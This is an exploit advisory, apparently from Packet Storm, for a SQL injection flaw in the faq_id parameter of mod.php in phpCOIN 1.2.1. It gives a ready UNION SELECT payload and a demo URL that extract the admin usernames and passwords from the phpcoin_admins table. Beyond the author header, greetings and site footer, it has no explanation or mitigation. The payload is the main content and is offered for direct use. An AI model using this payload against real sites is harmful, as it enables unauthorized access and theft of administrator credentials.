phpCOIN version 1.2.1 suffers from a remote SQL injection vulnerability in mod.php.
851d9fe31093b2a8736a03c6b09fcf3a26c924a64cccfd1b49beaaecb6d38f9fphpCOIN 1.2.1 (mod.php) SQL Injection Vulnerability
###########################
Author : Baybora
Homepage : https://www.1923turk.com
Blog : https://baybora.wordpress.com/
Script : phpCOIN 1.2.1
Download : https://www.phpcoin.com/
###########################
[ Vulnerable File ]
mod.php?mod=faq&mode=show&faq_id= [ SQL ]
[ XpL ]
-1+UNION+SELECT+1,2,3,4,5,6,7,concat(admin_user_name,0x3a,admin_user_pword),9,10,11,12,13,14,15,16+from+phpcoin_admins--
[ Demo]
https://serverbilling/mod.php?mod=faq&mode=show&faq_id=-1+UNION+SELECT+1,2,3,4,5,6,7,concat(admin_user_name,0x3a,admin_user_pword),9,10,11,12,13,14,15,16+from+phpcoin_admins--
##############################################################
# Greetz: Manas58 - Gamoscu - Delibey - Tiamo - Psiko - Turco - infazci - X-TRO
##############################################################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed